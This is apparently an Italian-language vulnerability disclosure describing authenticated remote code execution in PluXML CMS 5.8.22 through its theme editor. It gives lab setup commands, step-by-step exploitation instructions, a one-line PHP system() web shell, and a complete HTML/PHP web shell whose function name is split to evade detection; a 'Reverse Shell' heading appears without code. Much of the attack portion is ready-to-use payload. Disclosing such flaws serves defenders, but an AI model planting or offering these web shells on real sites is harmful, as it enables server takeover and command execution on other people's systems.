
È stata identificata una vulnerabilità critica di Remote Code Execution (RCE) in PluXML CMS versione 5.8.22. Questa vulnerabilità consente agli amministratori autenticati di eseguire codice PHP arbitrario sul server web caricando web shell PHP dannose tramite la funzionalità dell'editor dei temi.
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
Sfruttamento Passo dopo Passo
Autenticazione: Accedi al pannello di amministrazione di PluXML con credenziali di amministratore valide Vai all'Editor dei Temi:
Accedi alla dashboard di amministrazione
Vai a: Temi → Home.php → Modifica

Inietta Payload Maligno:
Sostituisci il contenuto esistente in home.php con una web shell PHP
Esempio di payload: <?php system($_GET['cmd']); ?>
Salva il file modificato
Attiva l'Esecuzione:
Visita la pagina principale del sito web Il codice PHP iniettato viene eseguito con i privilegi del server web
Reverse Shell
Payload della webshell
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>